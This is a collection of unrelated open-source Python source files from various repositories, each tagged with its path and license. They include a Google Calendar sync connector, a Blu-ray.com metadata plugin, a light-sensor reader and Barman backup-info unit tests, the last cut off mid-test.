'priority': priority,
'systemout': self._getCapturedStdout(),
'systemerr': self._getCapturedStderr(),
}
if err:
report['error'] = {
'type': nice_classname(err[0]),
'message': exc_message(err),
'tb': format_exception(err),
}
self.testcases.append(report)
def addError(self, test, err, capt=None):
if issubclass(err[0], SkipTest):
status = 'skipped'
self.stats['skipped'] += 1
else:
status = 'error'
self.stats['errors'] += 1
self.form_test_report(test, err, status)
def addFailure(self, test, err, capt=None, tb_info=None):
self.stats['failures'] += 1
status = 'fail'
self.form_test_report(test, err, status)
def addSuccess(self, test, capt=None):
self.stats['passes'] += 1
self.form_test_report(test)
def _forceUnicode(self, s):
if not UNICODE_STRINGS:
if isinstance(s, str):
s = s.decode(self.encoding, 'replace')
return s | 2gis/lode_runner | lode_runner/plugins/json_reporter.py | Python | mpl-2.0 | 5,261 |
from __future__ import unicode_literals
import frappe
from frappe.data_migration.doctype.data_migration_connector.connectors.base import BaseConnection
import googleapiclient.discovery
import google.oauth2.credentials
from googleapiclient.errors import HttpError
import time
from datetime import datetime
from frappe.utils import add_days, add_years
class CalendarConnector(BaseConnection):
def __init__(self, connector):
self.connector = connector
settings = frappe.get_doc("GCalendar Settings", None)
self.account = frappe.get_doc("GCalendar Account", connector.username)
self.credentials_dict = {
'token': self.account.get_password(fieldname='session_token', raise_exception=False),
'refresh_token': self.account.get_password(fieldname='refresh_token', raise_exception=False),
'token_uri': 'https://www.googleapis.com/oauth2/v4/token',
'client_id': settings.client_id,
'client_secret': settings.get_password(fieldname='client_secret', raise_exception=False),
'scopes':'https://www.googleapis.com/auth/calendar'
}
self.name_field = 'id'
self.credentials = google.oauth2.credentials.Credentials(**self.credentials_dict)
self.gcalendar = googleapiclient.discovery.build('calendar', 'v3', credentials=self.credentials)
self.check_remote_calendar()
def check_remote_calendar(self):
def _create_calendar():
timezone = frappe.db.get_value("System Settings", None, "time_zone")
calendar = {
'summary': self.account.calendar_name,
'timeZone': timezone
}
try:
created_calendar = self.gcalendar.calendars().insert(body=calendar).execute()
frappe.db.set_value("GCalendar Account", self.account.name, "gcalendar_id", created_calendar["id"])
except Exception:
frappe.log_error(frappe.get_traceback())
try:
if self.account.gcalendar_id is not None:
try:
self.gcalendar.calendars().get(calendarId=self.account.gcalendar_id).execute()
except Exception:
frappe.log_error(frappe.get_traceback())
else:
_create_calendar()
except HttpError as err:
if err.resp.status in [403, 500, 503]:
time.sleep(5)
elif err.resp.status in [404]:
_create_calendar()
else: raise
def get(self, remote_objectname, fields=None, filters=None, start=0, page_length=10):
return self.get_events(remote_objectname, filters, page_length)
def insert(self, doctype, doc):
if doctype == 'Events':
from frappe.desk.doctype.event.event import has_permission
d = frappe.get_doc("Event", doc["name"])
if has_permission(d, self.account.name):
if doc["start_datetime"] >= datetime.now():
try:
doctype = "Event"
e = self.insert_events(doctype, doc)
return e
except Exception:
frappe.log_error(frappe.get_traceback(), "GCalendar Synchronization Error")
def update(self, doctype, doc, migration_id):
if doctype == 'Events':
from frappe.desk.doctype.event.event import has_permission
d = frappe.get_doc("Event", doc["name"])
if has_permission(d, self.account.name):
if doc["start_datetime"] >= datetime.now() and migration_id is not None:
try:
doctype = "Event"
return self.update_events(doctype, doc, migration_id)
except Exception:
frappe.log_error(frappe.get_traceback(), "GCalendar Synchronization Error")
def delete(self, doctype, migration_id):
if doctype == 'Events':
try:
return self.delete_events(migration_id)
except Exception:
frappe.log_error(frappe.get_traceback(), "GCalendar Synchronization Error")
def get_events(self, remote_objectname, filters, page_length):
page_token = None
results = []
events = {"items": []}
while True:
try:
events = self.gcalendar.events().list(calendarId=self.account.gcalendar_id, maxResults=page_length,
singleEvents=False, showDeleted=True, syncToken=self.account.next_sync_token or None).execute()
except HttpError as err:
if err.resp.status in [410]:
events = self.gcalendar.events().list(calendarId=self.account.gcalendar_id, maxResults=page_length,
singleEvents=False, showDeleted=True, timeMin=add_years(None, -1).strftime('%Y-%m-%dT%H:%M:%SZ')).execute()
else:
frappe.log_error(err.resp, "GCalendar Events Fetch Error")
for event in events['items']:
event.update({'account': self.account.name})
event.update({'calendar_tz': events['timeZone']})
results.append(event)
page_token = events.get('nextPageToken')
if not page_token:
if events.get('nextSyncToken'):
frappe.db.set_value("GCalendar Account", self.connector.username, "next_sync_token", events.get('nextSyncToken'))
break
return list(results)
def insert_events(self, doctype, doc, migration_id=None):
event = {
'summary': doc.summary,
'description': doc.description
}
dates = self.return_dates(doc)
event.update(dates)
if migration_id:
event.update({"id": migration_id})
if doc.repeat_this_event != 0:
recurrence = self.return_recurrence(doctype, doc)
if not not recurrence:
event.update({"recurrence": ["RRULE:" + str(recurrence)]})
try:
remote_event = self.gcalendar.events().insert(calendarId=self.account.gcalendar_id, body=event).execute()
return {self.name_field: remote_event["id"]}
except Exception:
frappe.log_error(frappe.get_traceback(), "GCalendar Synchronization Error")
def update_events(self, doctype, doc, migration_id):
try:
event = self.gcalendar.events().get(calendarId=self.account.gcalendar_id, eventId=migration_id).execute()
event = {
'summary': doc.summary,
'description': doc.description
}
if doc.event_type == "Cancel":
event.update({"status": "cancelled"})
dates = self.return_dates(doc)
event.update(dates)
if doc.repeat_this_event != 0:
recurrence = self.return_recurrence(doctype, doc)
if recurrence:
event.update({"recurrence": ["RRULE:" + str(recurrence)]})
try:
updated_event = self.gcalendar.events().update(calendarId=self.account.gcalendar_id, eventId=migration_id, body=event).execute()
return {self.name_field: updated_event["id"]}
except Exception as e:
frappe.log_error(e, "GCalendar Synchronization Error")
except HttpError as err:
if err.resp.status in [404]:
self.insert_events(doctype, doc, migration_id)
else:
frappe.log_error(err.resp, "GCalendar Synchronization Error")
def delete_events(self, migration_id):
try:
self.gcalendar.events().delete(calendarId=self.account.gcalendar_id, eventId=migration_id).execute()
except HttpError as err:
if err.resp.status in [410]:
pass
def return_dates(self, doc):
timezone = frappe.db.get_value("System Settings", None, "time_zone")
if doc.end_datetime is None:
doc.end_datetime = doc.start_datetime
if doc.all_day == 1:
return {
'start': {
'date': doc.start_datetime.date().isoformat(),
'timeZone': timezone,
},
'end': {
'date': add_days(doc.end_datetime.date(), 1).isoformat(),
'timeZone': timezone,
}
}
else:
return {
'start': {
'dateTime': doc.start_datetime.isoformat(),
'timeZone': timezone,
},
'end': {
'dateTime': doc.end_datetime.isoformat(),
'timeZone': timezone,
}
}
def return_recurrence(self, doctype, doc):
e = frappe.get_doc(doctype, doc.name)
if e.repeat_till is not None:
end_date = datetime.combine(e.repeat_till, datetime.min.time()).strftime('UNTIL=%Y%m%dT%H%M%SZ')
else:
end_date = None
day = []
if e.repeat_on == "Every Day":
if e.monday is not None:
day.append("MO")
if e.tuesday is not None:
day.append("TU")
if e.wednesday is not None:
day.append("WE")
if e.thursday is not None:
day.append("TH")
if e.friday is not None:
day.append("FR")
if e.saturday is not None:
day.append("SA")
if e.sunday is not None:
day.append("SU")
day = "BYDAY=" + ",".join(str(d) for d in day)
frequency = "FREQ=DAILY"
elif e.repeat_on == "Every Week":
frequency = "FREQ=WEEKLY"
elif e.repeat_on == "Every Month":
frequency = "FREQ=MONTHLY;BYDAY=SU,MO,TU,WE,TH,FR,SA;BYSETPOS=-1"
end_date = datetime.combine(add_days(e.repeat_till, 1), datetime.min.time()).strftime('UNTIL=%Y%m%dT%H%M%SZ')
elif e.repeat_on == "Every Year":
frequency = "FREQ=YEARLY"
else:
return None
wst = "WKST=SU"
elements = [frequency, end_date, wst, day]
return ";".join(str(e) for e in elements if e is not None and not not e)
| ESS-LLP/frappe | frappe/data_migration/doctype/data_migration_connector/connectors/calendar_connector.py | Python | mit | 8,438 |
from bluetooth import *
nearby_devices = discover_devices()
for device in nearby_devices:
print("%s - %s" % (lookup_name(device), device))
| zach-king/Python-Miscellaneous | Bluetooth/showdevices.py | Python | gpl-2.0 | 145 |
from . import sheet_geometry
| CellModels/tyssue | tyssue/geometry/__init__.py | Python | gpl-2.0 | 29 |
# proxy module
from __future__ import absolute_import
from apptools.appscripting.package_globals import *
| enthought/etsproxy | enthought/appscripting/package_globals.py | Python | bsd-3-clause | 106 |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import logging
from datetime import datetime, timedelta
import time
from sqlalchemy import Table, Column, Integer, Float, Unicode, DateTime, Date, func
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.schema import ForeignKey
from sqlalchemy.orm import relation
from dateutil.parser import parse as dateutil_parse
from flexget import db_schema, plugin
from flexget.utils.soup import get_soup
from flexget.event import event
from flexget.utils import requests
from flexget.utils.database import year_property
log = logging.getLogger('api_bluray')
Base = db_schema.versioned_base('api_bluray', 0)
# association tables
genres_table = Table('bluray_movie_genres', Base.metadata,
Column('movie_id', Integer, ForeignKey('bluray_movies.id')),
Column('genre_name', Integer, ForeignKey('bluray_genres.name')))
Base.register_table(genres_table)
BASE_URL = 'http://m.blu-ray.com/'
def bluray_request(endpoint, **params):
full_url = BASE_URL + endpoint
return requests.get(full_url, params=params).json(strict=False)
def extract_release_date(release_date):
if not release_date or release_date.lower() == 'no release date':
release_date = 'Dec 31, %s' % datetime.now().year
return dateutil_parse(release_date).date()
class BlurayMovie(Base):
__tablename__ = 'bluray_movies'
id = Column(Integer, primary_key=True, autoincrement=False, nullable=False)
name = Column(Unicode)
url = Column(Unicode)
release_date = Column(Date)
year = year_property('release_date')
runtime = Column(Integer)
overview = Column(Unicode)
country = Column(Unicode)
studio = Column(Unicode)
rating = Column(Float)
bluray_rating = Column(Integer)
certification = Column(Unicode)
_genres = relation('BlurayGenre', secondary=genres_table, backref='movies')
genres = association_proxy('_genres', 'name')
updated = Column(DateTime, default=datetime.now, nullable=False)
def __init__(self, title, year):
if year:
title_year = '{} ({})'.format(title, year)
else:
title_year = title
params = {
'section': 'bluraymovies',
'country': 'ALL',
'keyword': title,
'_': str(int(time.time() * 1000))
}
country_params = {'_': params['_']}
try:
search_results = bluray_request('quicksearch/search.php', **params)['items']
countries = bluray_request('countries.json.php', **country_params) or {}
if not search_results:
raise LookupError('No search results found for {} on blu-ray.com'.format(title_year))
search_results = sorted(search_results, key=lambda k: extract_release_date(k.get('reldate')))
except requests.RequestException as e:
raise LookupError('Error searching for {} on blu-ray.com: {}'.format(title_year, e))
# Simply take the first result unless year does not match
for result in search_results:
if year and str(year) != result['year']:
continue
self.id = int(result['url'].split('/')[-2])
self.name = result['title']
flag = result['flag']
country_code = flag.split('/')[-1].split('.')[0].lower() # eg. http://some/url/UK.png -> uk
# find country based on flag url, default United States
country = 'United States'
for c in countries['countries']:
if c['c'].lower() == country_code:
country = c['n']
self.country = country
self.release_date = extract_release_date(result.get('reldate'))
self.bluray_rating = int(result['rating']) if result['rating'] else None
# Used for parsing some more data, sadly with soup
self.url = result['url']
movie_info_response = requests.get(self.url).content
movie_info = get_soup(movie_info_response)
# runtime and rating, should be the last span tag with class subheading
bluray_info = movie_info.find('div', attrs={'class': 'bluray'})
bluray_info = bluray_info.find_all('span', attrs={'class': 'subheading'})[-1].text.split('|')
self.studio = bluray_info[0].strip()
for info in bluray_info[1:]:
if 'min' in info:
self.runtime = int(info.replace('min', '').strip())
elif 'Rated' in info:
self.certification = info.replace('Rated', '').strip()
# rating
rating_tag = movie_info.find('div', id='ratingscore')
self.rating = float(rating_tag.text.strip()) if rating_tag else None
# Third onecol_content contains some information we want
onecol_content = movie_info.find_all('div', attrs={'class': 'onecol_content'})[2]
# overview, genres etc
contents = onecol_content.find('div').find('div')
overview_tag = contents.find('p')
self.overview = overview_tag.text.strip() if overview_tag else None
# genres
genres_table = contents.find('table')
if not genres_table:
break
genres_content = genres_table.find_all('tr')
if not genres_content:
break
genres = set()
for genre in genres_content:
genres.add(genre.find('td').text.strip())
self._genres = [BlurayGenre(name=genre) for genre in genres]
break
else:
raise LookupError('No search results found for {} on blu-ray.com'.format(title_year))
class BlurayGenre(Base):
__tablename__ = 'bluray_genres'
name = Column(Unicode, primary_key=True, nullable=False)
class BluraySearchResult(Base):
__tablename__ = 'bluray_search_results'
search = Column(Unicode, primary_key=True)
movie_id = Column(Integer, ForeignKey('bluray_movies.id'), nullable=True)
movie = relation(BlurayMovie)
def __init__(self, search, movie_id=None, movie=None):
self.search = search.lower()
if movie_id:
self.movie_id = movie_id
if movie:
self.movie = movie
class ApiBluray(object):
"""Does lookups to Blu-ray.com and provides movie information. Caches lookups."""
@staticmethod
def lookup(title=None, year=None, only_cached=False, session=None):
if not title:
raise LookupError('No criteria specified for blu-ray.com lookup')
title_year = title + ' ({})'.format(year) if year else title
movie_filter = session.query(BlurayMovie).filter(func.lower(BlurayMovie.name) == title.lower())
if year:
movie_filter = movie_filter.filter(BlurayMovie.year == year)
movie = movie_filter.first()
if not movie:
found = session.query(BluraySearchResult). \
filter(BluraySearchResult.search == title_year.lower()).first()
if found and found.movie:
movie = found.movie
if movie:
# Movie found in cache, check if cache has expired. Shamefully stolen from api_tmdb
refresh_time = timedelta(days=2)
if movie.release_date:
if movie.release_date > datetime.now().date() - timedelta(days=7):
# Movie is less than a week old, expire after 1 day
refresh_time = timedelta(days=1)
else:
age_in_years = (datetime.now().date() - movie.release_date).days / 365
refresh_time += timedelta(days=age_in_years * 5)
if movie.updated < datetime.now() - refresh_time and not only_cached:
log.debug('Cache has expired for %s, attempting to refresh from blu-ray.com.', movie.name)
try:
updated_movie = BlurayMovie(title=title, year=year)
except LookupError as e:
log.error('Error refreshing movie details for %s from blu-ray.com, cached info being used. %s',
title, e)
else:
movie = session.merge(updated_movie)
else:
log.debug('Movie %s information restored from cache.', movie.name)
else:
if only_cached:
raise LookupError('Movie %s not found from cache' % title_year)
# There was no movie found in the cache, do a lookup from blu-ray.com
log.verbose('Searching from blu-ray.com `%s`', title)
# Add/merge movie to db
movie = BlurayMovie(title=title, year=year)
# Add to search results table if necessary
if title.lower() != movie.name.lower():
session.add(BluraySearchResult(search=title_year.lower(), movie_id=movie.id))
session.merge(movie)
if not movie:
raise LookupError('Unable to find movie on blu-ray: {}'.format(title_year))
return movie
@event('plugin.register')
def register_plugin():
plugin.register(ApiBluray, 'api_bluray', api_ver=2, interfaces=[])
| qk4l/Flexget | flexget/plugins/internal/api_bluray.py | Python | mit | 9,392 |
#!/usr/bin/python
# ---------------------------------------------------------------------
# ___ ___ _ ____
# / _ \/ _ \(_) __/__ __ __
# / , _/ ___/ /\ \/ _ \/ // /
# /_/|_/_/ /_/___/ .__/\_, /
# /_/ /___/
#
# bh1750.py
# Read data from a BH1750 digital light sensor.
#
# Author : Matt Hawkins
# Date : 26/06/2018
#
# For more information please visit :
# https://www.raspberrypi-spy.co.uk/?s=bh1750
#
# ---------------------------------------------------------------------
try:
import smbus
except:
smbus = None
import time
from threading import Lock
bh_lock = Lock()
class BH1750:
DEVICE = 0x23 # Default device I2C address
POWER_DOWN = 0x00 # No active state
POWER_ON = 0x01 # Power on
RESET = 0x07 # Reset data register value
# Start measurement at 4lx resolution. Time typically 16ms.
CONTINUOUS_LOW_RES_MODE = 0x13
# Start measurement at 1lx resolution. Time typically 120ms
CONTINUOUS_HIGH_RES_MODE_1 = 0x10
# Start measurement at 0.5lx resolution. Time typically 120ms
CONTINUOUS_HIGH_RES_MODE_2 = 0x11
# Start measurement at 1lx resolution. Time typically 120ms
# Device is automatically set to Power Down after measurement.
ONE_TIME_HIGH_RES_MODE_1 = 0x20
# Start measurement at 0.5lx resolution. Time typically 120ms
# Device is automatically set to Power Down after measurement.
ONE_TIME_HIGH_RES_MODE_2 = 0x21
# Start measurement at 1lx resolution. Time typically 120ms
# Device is automatically set to Power Down after measurement.
ONE_TIME_LOW_RES_MODE = 0x23
if smbus:
# bus = smbus.SMBus(0) # Rev 1 Pi uses 0
bus = smbus.SMBus(1) # Rev 2 Pi uses 1
else:
bus = None
def __init__(self, **kwargs):
pass
def convertToNumber(self, data):
# Simple function to convert 2 bytes of data
# into a decimal number. Optional parameter 'decimals'
# will round to specified number of decimal places.
if data:
result = (data[1] + (256 * data[0])) / 1.2
else:
result = 0
return result
def readLight(self, addr=DEVICE):
# Read data from I2C interface
bh_lock.acquire()
if self.bus:
data = self.bus.read_i2c_block_data(addr, BH1750.ONE_TIME_HIGH_RES_MODE_1)
else:
data = None
bh_lock.release()
return self.convertToNumber(data)
def main():
bh = BH1750()
while True:
lightLevel = bh.readLight()
print("Light Level : " + format(lightLevel, '.2f') + " lx")
time.sleep(0.5)
if __name__ == "__main__":
main()
| ThomasHangstoerfer/pyHomeCtrl | bh1750.py | Python | apache-2.0 | 2,676 |
# The Nexus software is licensed under the BSD 2-Clause license.
#
# You should have recieved a copy of this license with the software.
# If you did not, you can find one at the following link.
#
# http://opensource.org/licenses/bsd-license.php
entitylist.append(["testbow",(x,y,z),8,8,None])
self.client.sendServerMessage("A testbow has been created.")
| TheArchives/Nexus | core/entities/testbow_create.py | Python | bsd-2-clause | 356 |
# Copyright (C) 2013-2016 2ndQuadrant Italia Srl
#
# This file is part of Barman.
#
# Barman is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Barman is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Barman. If not, see <http://www.gnu.org/licenses/>.
import json
import os
from datetime import datetime
import mock
import pytest
from dateutil.tz import tzlocal, tzoffset
from barman.infofile import (BackupInfo, Field, FieldListFile, WalFileInfo,
load_datetime_tz)
from testing_helpers import build_mocked_server
BASE_BACKUP_INFO = """backup_label=None
begin_offset=40
begin_time=2014-12-22 09:25:22.561207+01:00
begin_wal=000000010000000000000004
begin_xlog=0/4000028
config_file=/fakepath/postgresql.conf
end_offset=184
end_time=2014-12-22 09:25:27.410470+01:00
end_wal=000000010000000000000004
end_xlog=0/40000B8
error=None
hba_file=/fakepath/pg_hba.conf
ident_file=/fakepath/pg_ident.conf
mode=default
pgdata=/fakepath/data
server_name=fake-9.4-server
size=20935690
status=DONE
tablespaces=[('fake_tbs', 16384, '/fake_tmp/tbs')]
timeline=1
version=90400"""
def test_load_datetime_tz():
"""
Unit test for load_datetime_tz function
This test covers all load_datetime_tz code with correct parameters
and checks that a ValueError is raised when called with a bad parameter.
"""
# try to load a tz-less timestamp
assert load_datetime_tz("2012-12-15 10:14:51.898000") == \
datetime(2012, 12, 15, 10, 14, 51, 898000,
tzinfo=tzlocal())
# try to load a tz-aware timestamp
assert load_datetime_tz("2012-12-15 10:14:51.898000 +0100") == \
datetime(2012, 12, 15, 10, 14, 51, 898000,
tzinfo=tzoffset('GMT+1', 3600))
# try to load an incorrect date
with pytest.raises(ValueError):
load_datetime_tz("Invalid datetime")
# noinspection PyMethodMayBeStatic
class TestField(object):
def test_field_creation(self):
field = Field('test_field')
assert field
def test_field_with_arguments(self):
dump_function = str
load_function = int
default = 10
docstring = 'Test Docstring'
field = Field('test_field', dump_function, load_function, default,
docstring)
assert field
assert field.name == 'test_field'
assert field.to_str == dump_function
assert field.from_str == load_function
assert field.default == default
assert field.__doc__ == docstring
def test_field_dump_decorator(self):
test_field = Field('test_field')
dump_function = str
test_field = test_field.dump(dump_function)
assert test_field.to_str == dump_function
def test_field_load_decorator(self):
test_field = Field('test_field')
load_function = int
test_field = test_field.dump(load_function)
assert test_field.to_str == load_function
class DummyFieldListFile(FieldListFile):
dummy = Field('dummy', dump=str, load=int, default=12, doc='dummy_field')
# noinspection PyMethodMayBeStatic
class TestFieldListFile(object):
def test_field_list_file_creation(self):
with pytest.raises(AttributeError):
FieldListFile(test_argument=11)
field = FieldListFile()
assert field
def test_subclass_creation(self):
with pytest.raises(AttributeError):
DummyFieldListFile(test_argument=11)
field = DummyFieldListFile()
assert field
assert field.dummy == 12
field = DummyFieldListFile(dummy=13)
assert field
assert field.dummy == 13
def test_subclass_access(self):
dummy = DummyFieldListFile()
dummy.dummy = 14
assert dummy.dummy == 14
with pytest.raises(AttributeError):
del dummy.dummy
def test_subclass_load(self, tmpdir):
tmp_file = tmpdir.join("test_file")
tmp_file.write('dummy=15\n')
dummy = DummyFieldListFile()
dummy.load(tmp_file.strpath)
assert dummy.dummy == 15
def test_subclass_save(self, tmpdir):
tmp_file = tmpdir.join("test_file")
dummy = DummyFieldListFile(dummy=16)
dummy.save(tmp_file.strpath)
assert 'dummy=16' in tmp_file.read()
def test_subclass_from_meta_file(self, tmpdir):
tmp_file = tmpdir.join("test_file")
tmp_file.write('dummy=17\n')
dummy = DummyFieldListFile.from_meta_file(tmp_file.strpath)
assert dummy.dummy == 17
def test_subclass_items(self):
dummy = DummyFieldListFile()
dummy.dummy = 18
assert list(dummy.items()) == [('dummy', '18')]
def test_subclass_repr(self):
dummy = DummyFieldListFile()
dummy.dummy = 18
assert repr(dummy) == "DummyFieldListFile(dummy='18')"
# noinspection PyMethodMayBeStatic
class TestWalFileInfo(object):
def test_from_file_no_compression(self, tmpdir):
tmp_file = tmpdir.join("000000000000000000000001")
tmp_file.write('dummy_content\n')
stat = os.stat(tmp_file.strpath)
wfile_info = WalFileInfo.from_file(tmp_file.strpath)
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == stat.st_size
assert wfile_info.time == stat.st_mtime
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
@mock.patch('barman.infofile.identify_compression')
def test_from_file_compression(self, id_compression, tmpdir):
# prepare
id_compression.return_value = 'test_compression'
tmp_file = tmpdir.join("000000000000000000000001")
tmp_file.write('dummy_content\n')
wfile_info = WalFileInfo.from_file(tmp_file.strpath)
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == tmp_file.size()
assert wfile_info.time == tmp_file.mtime()
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression == 'test_compression'
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
@mock.patch('barman.infofile.identify_compression')
def test_from_file_default_compression(self, id_compression, tmpdir):
# prepare
id_compression.return_value = None
tmp_file = tmpdir.join("00000001000000E500000064")
tmp_file.write('dummy_content\n')
wfile_info = WalFileInfo.from_file(
tmp_file.strpath,
default_compression='test_default_compression')
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == tmp_file.size()
assert wfile_info.time == tmp_file.mtime()
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression == 'test_default_compression'
assert wfile_info.relpath() == (
'00000001000000E5/00000001000000E500000064')
@mock.patch('barman.infofile.identify_compression')
def test_from_file_override_compression(self, id_compression, tmpdir):
# prepare
id_compression.return_value = None
tmp_file = tmpdir.join("000000000000000000000001")
tmp_file.write('dummy_content\n')
wfile_info = WalFileInfo.from_file(
tmp_file.strpath,
default_compression='test_default_compression',
compression='test_override_compression')
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == tmp_file.size()
assert wfile_info.time == tmp_file.mtime()
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression == 'test_override_compression'
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
@mock.patch('barman.infofile.identify_compression')
def test_from_file_override(self, id_compression, tmpdir):
# prepare
id_compression.return_value = None
tmp_file = tmpdir.join("000000000000000000000001")
tmp_file.write('dummy_content\n')
wfile_info = WalFileInfo.from_file(
tmp_file.strpath,
name="000000000000000000000002")
assert wfile_info.name == '000000000000000000000002'
assert wfile_info.size == tmp_file.size()
assert wfile_info.time == tmp_file.mtime()
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression is None
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000002')
wfile_info = WalFileInfo.from_file(
tmp_file.strpath,
size=42)
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == 42
assert wfile_info.time == tmp_file.mtime()
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression is None
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
wfile_info = WalFileInfo.from_file(
tmp_file.strpath,
time=43)
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == tmp_file.size()
assert wfile_info.time == 43
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression is None
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
def test_to_xlogdb_line(self):
wfile_info = WalFileInfo()
wfile_info.name = '000000000000000000000002'
wfile_info.size = 42
wfile_info.time = 43
wfile_info.compression = None
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000002')
assert wfile_info.to_xlogdb_line() == (
'000000000000000000000002\t42\t43\tNone\n')
def test_from_xlogdb_line(self):
"""
Test the conversion from a string to a WalFileInfo file
"""
# build a WalFileInfo object
wfile_info = WalFileInfo()
wfile_info.name = '000000000000000000000001'
wfile_info.size = 42
wfile_info.time = 43
wfile_info.compression = None
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
# mock a server object
server = mock.Mock(name='server')
server.config.wals_directory = '/tmp/wals'
# parse the string
info_file = wfile_info.from_xlogdb_line(
'000000000000000000000001\t42\t43\tNone\n')
assert list(wfile_info.items()) == list(info_file.items())
def test_timezone_aware_parser(self):
"""
Test the timezone_aware_parser method with different string
formats
"""
# test case 1 string with timezone info
tz_string = '2009/05/13 19:19:30 -0400'
result = load_datetime_tz(tz_string)
assert result.tzinfo == tzoffset(None, -14400)
# test case 2 string with timezone info with a different format
tz_string = '2004-04-09T21:39:00-08:00'
result = load_datetime_tz(tz_string)
assert result.tzinfo == tzoffset(None, -28800)
# test case 3 string without timezone info,
# expecting tzlocal() as timezone
tz_string = str(datetime.now())
result = load_datetime_tz(tz_string)
assert result.tzinfo == tzlocal()
# test case 4 string with a wrong timezone format,
# expecting tzlocal() as timezone
tz_string = '16:08:12 05/08/03 AEST'
result = load_datetime_tz(tz_string)
assert result.tzinfo == tzlocal()
# noinspection PyMethodMayBeStatic
class TestBackupInfo(object):
def test_backup_info_from_file(self, tmpdir):
"""
Test the initialization of a BackupInfo object
loading data from a backup.info file
"""
# we want to test the loading of BackupInfo data from local file.
# So we create a file into the tmpdir containing a
# valid BackupInfo dump
infofile = tmpdir.join("backup.info")
infofile.write(BASE_BACKUP_INFO)
# Mock the server, we don't need it at the moment
server = build_mocked_server()
# load the data from the backup.info file
b_info = BackupInfo(server, info_file=infofile.strpath)
assert b_info
assert b_info.begin_offset == 40
assert b_info.begin_wal == '000000010000000000000004'
assert b_info.timeline == 1
assert isinstance(b_info.tablespaces, list)
assert b_info.tablespaces[0].name == 'fake_tbs'
assert b_info.tablespaces[0].oid == 16384
assert b_info.tablespaces[0].location == '/fake_tmp/tbs'
def test_backup_info_from_empty_file(self, tmpdir):
"""
Test the initialization of a BackupInfo object
loading data from a backup.info file
"""
# we want to test the loading of BackupInfo data from local file.
# So we create a file into the tmpdir containing a
# valid BackupInfo dump
infofile = tmpdir.join("backup.info")
infofile.write('')
# Mock the server, we don't need it at the moment
server = build_mocked_server(name='test_server')
server.backup_manager.name = 'test_mode'
# load the data from the backup.info file
b_info = BackupInfo(server, info_file=infofile.strpath)
assert b_info
assert b_info.server_name == 'test_server'
assert b_info.mode == 'test_mode'
def test_backup_info_from_backup_id(self, tmpdir):
"""
Test the initialization of a BackupInfo object
using a backup_id as argument
"""
# We want to test the loading system using a backup_id.
# So we create a backup.info file into the tmpdir then
# we instruct the configuration on the position of the
# testing backup.info file
server = build_mocked_server(
main_conf={
'basebackups_directory': tmpdir.strpath
},
)
infofile = tmpdir.mkdir('fake_name').join('backup.info')
infofile.write(BASE_BACKUP_INFO)
# Load the backup.info file using the backup_id
b_info = BackupInfo(server, backup_id="fake_name")
assert b_info
assert b_info.begin_offset == 40
assert b_info.begin_wal == '000000010000000000000004'
assert b_info.timeline == 1
assert isinstance(b_info.tablespaces, list)
assert b_info.tablespaces[0].name == 'fake_tbs'
assert b_info.tablespaces[0].oid == 16384
assert b_info.tablespaces[0].location == '/fake_tmp/tbs'
def test_backup_info_save(self, tmpdir):
"""
Test the save method of a BackupInfo object
"""
# Check the saving method.
# Load a backup.info file, modify the BackupInfo object
# then save it.
server = build_mocked_server(
main_conf={
'basebackups_directory': tmpdir.strpath
},
)
backup_dir = tmpdir.mkdir('fake_name')
infofile = backup_dir.join('backup.info')
b_info = BackupInfo(server, backup_id="fake_name")
b_info.status = BackupInfo.FAILED
b_info.save()
# read the file looking for the modified line
for line in infofile.readlines():
if line.startswith("status"):
assert line.strip() == "status=FAILED"
def test_backup_info_version(self, tmpdir):
"""
Simple test for backup_version management.
"""
server = build_mocked_server(
main_conf={
'basebackups_directory': tmpdir.strpath
},
)
# new version
backup_dir = tmpdir.mkdir('fake_backup_id')
backup_dir.mkdir('data')
backup_dir.join('backup.info')
b_info = BackupInfo(server, backup_id="fake_backup_id")
assert b_info.backup_version == 2
# old version
backup_dir = tmpdir.mkdir('another_fake_backup_id')
backup_dir.mkdir('pgdata')
backup_dir.join('backup.info')
b_info = BackupInfo(server, backup_id="another_fake_backup_id")
assert b_info.backup_version == 1
def test_data_dir(self, tmpdir):
"""
Simple test for the method that is responsible of the build of the
path to the datadir and to the tablespaces dir according
with backup_version
"""
server = build_mocked_server(
main_conf={
'basebackups_directory': tmpdir.strpath
},
)
# Build a fake v2 backup
backup_dir = tmpdir.mkdir('fake_backup_id')
data_dir = backup_dir.mkdir('data')
info_file = backup_dir.join('backup.info')
info_file.write(BASE_BACKUP_INFO)
b_info = BackupInfo(server, backup_id="fake_backup_id")
# Check that the paths are built according with version
assert b_info.backup_version == 2
assert b_info.get_data_directory() == data_dir.strpath
assert b_info.get_data_directory(16384) == (backup_dir.strpath +
'/16384')
# Build a fake v1 backup
